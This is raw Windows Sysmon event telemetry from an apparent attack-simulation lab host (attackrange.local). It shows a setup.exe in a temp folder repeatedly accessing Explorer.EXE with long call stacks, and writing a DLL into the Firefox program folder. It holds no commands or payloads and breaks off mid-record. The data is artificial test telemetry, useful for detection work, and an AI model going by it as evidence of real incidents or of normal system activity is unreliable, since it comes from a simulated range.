13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll2021-01-18 13:59:52.239 10341000x800000000000000014564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow